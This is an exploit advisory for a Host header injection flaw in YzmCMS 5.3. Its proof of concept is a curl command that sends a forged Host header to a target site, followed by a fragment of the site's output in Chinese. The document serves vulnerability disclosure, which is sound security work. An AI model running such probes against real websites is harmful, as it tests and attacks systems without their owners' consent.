YzmCMS - 演示站

# Exploit Title: YzmCMS 5.3 - 'Host' Header Injection # Exploit Author: Debashis Pal # Vendor Homepage: http://www.yzmcms.com/ # Source: https://github.com/yzmcms/yzmcms # Version: YzmCMS V5.3 # CVE : N/A # Tested on: Windows 7 SP1(64bit),XAMPP: 7.3.9 #About YzmCMS ============== YzmCMS is a lightweight open source content management system that uses OOP (Object Oriented) to develop its own framework. #Vulnerability =============== Host Header Injection. #PoC ===== #YzmCMS V5.3 Access Path: TARGET/yzmcms/ curl http://TARGET/yzmcms/ -H "Host: www.google.com" //sample output start YzmCMS - 演示站

欢迎光临本站！